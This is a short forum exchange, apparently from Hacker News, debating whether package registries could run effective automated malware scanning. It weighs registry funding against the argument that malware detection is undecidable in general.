▲ | hobofan 5 days ago | |||||||
> If automated scanning were truly effective, we'd see deployments across all major package registries. No we wouldn't. Most package registries are run by either bigcorps at a loss or by community maintainers (with bigcorps again sponsoring the infrastructure). And many of them barely go beyond the "CRUD" of package publishing due to lack of resources. The economic incentives of building up supply chain security tools into the package registries themselves are just not there. | ||||||||
▲ | kjok 5 days ago | parent [-] | |||||||
You're right that registries are under-resourced. But, if automated malware scanning actually worked, we'd already see big tech partnering with package registries to run continuous, ecosystem-wide scanning and detection pipelines. However, that isn't happening. Instead, we see piecemeal efforts from Google with assurance artifacts (SLSA provenance, SBOMs, verifiable builds), Microsoft sponsoring OSS maintainers, Facebook donating to package registries. Google's initiatives stop short of claiming they can automatically detect malware. This distinction matters. Malware detection is, in the general case, an undecidable problem (think halting problem and Rice theorem). No amount of static or dynamic scanning can guarantee catching malicious logic in arbitrary code. At best, scanners detect known signatures, patterns, or anomalies. They can't prove absence of malicious behavior. So the reality is: if Google's assurance artifacts stop short of claiming automated malware detection is feasible, it's a stretch for anyone else to suggest registries could achieve it "if they just had more resources." The problem space itself is the blocker, not just lack of infra or resources. | ||||||||
|